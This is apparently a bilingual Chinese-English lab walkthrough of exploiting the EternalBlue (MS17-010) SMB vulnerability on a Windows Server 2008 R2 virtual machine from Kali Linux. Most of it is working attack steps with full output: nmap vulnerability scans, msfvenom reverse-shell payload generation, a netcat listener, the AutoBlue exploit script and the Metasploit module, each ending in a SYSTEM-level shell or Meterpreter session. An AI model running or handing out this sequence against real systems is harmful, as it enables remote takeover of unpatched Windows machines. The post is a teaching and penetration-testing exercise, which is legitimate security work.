Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)(利用 Windows MS17-010 SMB 漏洞(EternalBlue))
MS17-010 永恒之蓝漏洞利用
EternalBlue (MS17-010/CVE-2017-0144) 是 Windows 漏洞和利用的集合的名称,这些漏洞和利用允许攻击者远程执行任意代码并访问 Windows 系统,从而访问目标系统所在的网络的。
EternalBlue 漏洞利用由 NSA(国家安全局)开发,以利用 MS17-010 漏洞,并于 2017 年由名为 Shadow Brokers 的黑客组织泄露给公众。
EternalBlue 漏洞利用了 Windows SMBv1 协议中的一个漏洞,该漏洞允许攻击者发送特制数据包,从而促进任意命令的执行。
EternalBlue 漏洞被用于 2017 年 6 月 27 日的 WannaCry 勒索软件攻击,通过网络利用其他 Windows 系统,目的是将勒索软件传播到尽可能多的系统。
此漏洞影响多个版本的 Windows:
- Windows Vista
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
- Windows Server 2016
微软于 2017 年 3 月发布了针对该漏洞的补丁,然而,许多用户和公司仍未修补他们的系统。
EternalBlue 漏洞利用有一个 MSF 辅助模块,可用于检查目标系统是否容易受到漏洞利用,还有一个漏洞利用模块可用于利用未修补系统上的漏洞。
EternalBlue 漏洞利用模块可用于利用易受攻击的 Windows 系统,从而为我们提供目标系统上的特权 Meterpreter 会话。
除了 MSF 模块,我们还可以通过利用可用的利用代码手动利用该漏洞。
Tools & Environment
AutoBlue-MS17-010: https://github.com/3ndG4me/AutoBlue-MS17-010
Target system: Windows Server 2008 R2
Penetration Testing distribution: Kali Linux
Demo: Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)(演示:利用 Windows MS17-010 SMB 漏洞 (EternalBlue))
1
sudo nmap -sV -p 445 -O 10.10.10.12
In order to identify wether the target is effected by Eternal Blue:
尝试检测 Microsoft SMBv1 服务器是否容易受到远程代码执行漏洞(ms17-010,又名 EternalBlue)的攻击。该漏洞被 WannaCry 和 Petya 勒索软件和其他恶意软件积极利用。
该脚本连接到 $IPC 树,在 FID 0 上执行事务并检查是否返回错误“STATUS_INSUFF_SERVER_RESOURCES”以确定目标是否未针对 ms17-010 进行修补。此外,它还会检查修补系统返回的已知错误代码。
1
sudo nmap -sV -p 445 --script=smb-vuln-ms17-010 10.10.10.12
1
2
3
4
ls -al
cd shellcode
ls
chmod +x shell_prep.sh
1
2
3
4
5
6
7
./shell_prep.sh
y
10.10.10.10
1234
1234
1
1
1
2
3
4
ls -al
sc_x64.bin
sc_x86.bin
1
nc -nvlp 1234
1
2
3
cd ..
chmod +x eternalblue_exploit7.py
ls -al
1
python eternalblue_exploit7.py 10.10.10.12 shellcode/sc_x64.bin
1
2
3
4
5
nc -nvlp 1234
C:\Windows\system32>whoami
whoami
nt authority\system
1
2
3
4
5
6
7
8
9
10
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.12
exploit
meterpreter > sysinfo
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Home Lab
环境:Windows Server 2008 R2 Standard
来源:https://msdn.itellyou.cn/
名称:Windows Server 2008 R2 Standard, Enterprise, Datacenter, and Web (x64) - DVD (Chinese-Simplified)
下载方式:迅雷
链接:
1
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_web_x64_dvd_x15-50360.iso|3270336512|994401AF40CF454135F4F9510829405D|/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[~]
└─# nmap -sV -O 192.168.248.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 05:33 EDT
Nmap scan report for 192.168.248.152
Host is up (0.00022s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.71 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~]
└─# nmap -sV -p 445 --script=smb-vuln-ms17-010 192.168.248.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 05:42 EDT
Nmap scan report for 192.168.248.152
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.248.148
LPORT you want x64 to listen on:
1234
LPORT you want x86 to listen on:
1234
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.248.148 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.248.148 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# ls -al
total 88
drwxr-xr-x 2 root root 4096 Oct 6 06:15 .
drwxr-xr-x 4 root root 4096 Oct 6 06:06 ..
-rw-r--r-- 1 root root 20305 Oct 6 06:06 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Oct 6 06:06 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root 1598 Oct 6 06:06 eternalblue_sc_merge.py
-rw-r--r-- 1 root root 2205 Oct 6 06:15 sc_all.bin
-rw-r--r-- 1 root root 1232 Oct 6 06:15 sc_x64.bin
-rw-r--r-- 1 root root 772 Oct 6 06:13 sc_x64_kernel.bin
-rw-r--r-- 1 root root 460 Oct 6 06:15 sc_x64_msf.bin
-rw-r--r-- 1 root root 962 Oct 6 06:15 sc_x86.bin
-rw-r--r-- 1 root root 638 Oct 6 06:13 sc_x86_kernel.bin
-rw-r--r-- 1 root root 324 Oct 6 06:15 sc_x86_msf.bin
-rwxr-xr-x 1 root root 4557 Oct 6 06:06 shell_prep.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010/shellcode]
└─# cd ..
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# ls
eternalblue_exploit10.py eternalblue_exploit7.py eternalblue_exploit8.py eternal_checker.py LICENSE listener_prep.sh mysmb.py README.md requirements.txt shellcode zzz_exploit.py
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# chmod +x eternalblue_exploit7.py
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# ls -al
total 200
drwxr-xr-x 4 root root 4096 Oct 6 06:06 .
drwxr-xr-x 3 root root 4096 Oct 6 06:06 ..
-rw-r--r-- 1 root root 26444 Oct 6 06:06 eternalblue_exploit10.py
-rwxr-xr-x 1 root root 25741 Oct 6 06:06 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24106 Oct 6 06:06 eternalblue_exploit8.py
-rw-r--r-- 1 root root 2801 Oct 6 06:06 eternal_checker.py
drwxr-xr-x 8 root root 4096 Oct 6 06:06 .git
-rw-r--r-- 1 root root 1070 Oct 6 06:06 LICENSE
-rwxr-xr-x 1 root root 3853 Oct 6 06:06 listener_prep.sh
-rw-r--r-- 1 root root 25725 Oct 6 06:06 mysmb.py
-rw-r--r-- 1 root root 5352 Oct 6 06:06 README.md
-rw-r--r-- 1 root root 8 Oct 6 06:06 requirements.txt
drwxr-xr-x 2 root root 4096 Oct 6 06:15 shellcode
-rw-r--r-- 1 root root 49249 Oct 6 06:06 zzz_exploit.py
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Windows/exploiting/AutoBlue-MS17-010]
└─# python eternalblue_exploit7.py 192.168.248.152 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7600
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.248.152.
Ncat: Connection from 192.168.248.152:49159.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>whoami
whoami
nt authority\system
或者是使用msfconsole:MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
MS17-010 EternalBlue SMB 远程 Windows 内核池损坏
该模块是 Equation Group ETERNALBLUE 漏洞利用的一个端口,它是 Shadow Brokers 发布的 FuzzBunch 工具包的一部分。Srv!SrvOs2FeaToNt 中存在缓冲区溢出 memmove 操作。大小在 Srv!SrvOs2FeaListSizeToNt 中计算,其中一个 DWORD 减去一个 WORD 时存在数学错误。内核池经过整理,以便很好地布局溢出以覆盖 SMBv1 缓冲区。实际的 RIP 劫持稍后在 srvnet!SrvNetWskReceiveComplete 中完成。此漏洞利用与原始漏洞一样,可能不会 100% 触发,应持续运行直到触发。看起来游泳池会变得很热,需要冷却一段时间才能再次下雨。默认情况下,该模块将尝试使用匿名登录来进行身份验证以执行漏洞利用。如果用户在 SMBUser、SMBPass 和 SMBDomain 选项中提供凭据,它将改用这些凭据。在某些系统上,此模块可能会导致系统不稳定和崩溃,例如 BSOD 或重新启动。对于某些有效负载,这可能更有可能。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.248.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.248.152
RHOSTS => 192.168.248.152
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.152:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.152:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.152:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.152:445 - The target is vulnerable.
[*] 192.168.248.152:445 - Connecting to target for exploitation.
[+] 192.168.248.152:445 - Connection established for exploitation.
[+] 192.168.248.152:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.152:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.152:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.152:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.152:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.152:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.152:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.152:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.152:445 - Starting non-paged pool grooming
[+] 192.168.248.152:445 - Sending SMBv2 buffers
[+] 192.168.248.152:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.152:445 - Sending final SMBv2 buffers.
[*] 192.168.248.152:445 - Sending last fragment of exploit packet!
[*] 192.168.248.152:445 - Receiving response from exploit packet
[+] 192.168.248.152:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.152:445 - Sending egg to corrupted connection.
[*] 192.168.248.152:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.152
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.152:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.152:49160) at 2022-10-06 06:42:56 -0400
meterpreter > sysinfo
Computer : WIN-4QCPUB6FIVL
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
